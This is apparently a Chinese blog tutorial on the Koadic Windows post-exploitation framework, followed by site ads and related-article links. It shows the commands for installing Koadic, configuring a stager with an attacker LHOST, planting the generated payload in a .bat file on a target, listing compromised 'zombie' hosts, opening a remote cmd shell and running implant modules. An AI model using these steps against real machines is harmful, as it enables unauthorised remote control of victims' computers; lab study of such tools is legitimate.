windows提权辅助工具koadic
项目地址:https://github.com/zerosum0x0/koadic
┌─[root@sch01ar]─[ /sch01ar ] └──╼ #git clone https://github.com/zerosum0x0/koadic |
下载后打开并安装所需的包
┌─[root@sch01ar]─[ /sch01ar/koadic ] └──╼ #pip install -r requirements.txt |
安装完成后启动程序
┌─[root@sch01ar]─[ /sch01ar/koadic ] └──╼ #./koadic |
输入use和空格然后连按两下Tab键查看模块
stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作
选择stager/js/disk进行测试
(koadic: sta /js/mshta ) # use stager/js/disk |
查看配置信息
(koadic: sta /js/disk ) # info |
设置lhost
(koadic: sta /js/disk ) # set LHOST 192.168.220.132 |
然后run
(koadic: sta /js/disk ) # run |
然后把[>]后的东西写到一个bat文件里,放到目标主机打开
注:stager开头的模块都是一样的操作
得到目标主机的反弹
查看僵尸主机列表
(koadic: sta /js/disk ) # zombies |
注:此目标主机的ID为0
执行cmd命令,0为主机的ID
(koadic: sta /js/disk ) # cmdshell 0 |
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami |
该上implant模块了
(koadic: sta /js/disk ) # use implant/fun/voice |
这个MESSAGE随便你设置,然后run
将会在目标主机朗读MESSAGE的内容
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Java 中堆内存和栈内存上的数据分布和特点
· 开发中对象命名的一点思考
· .NET Core内存结构体系(Windows环境)底层原理浅谈
· C# 深度学习:对抗生成网络(GAN)训练头像生成模型
· .NET 适配 HarmonyOS 进展
· 本地部署 DeepSeek:小白也能轻松搞定!
· 如何给本地部署的DeepSeek投喂数据,让他更懂你
· 从 Windows Forms 到微服务的经验教训
· 李飞飞的50美金比肩DeepSeek把CEO忽悠瘸了,倒霉的却是程序员
· 超详细,DeepSeek 接入PyCharm实现AI编程!(支持本地部署DeepSeek及官方Dee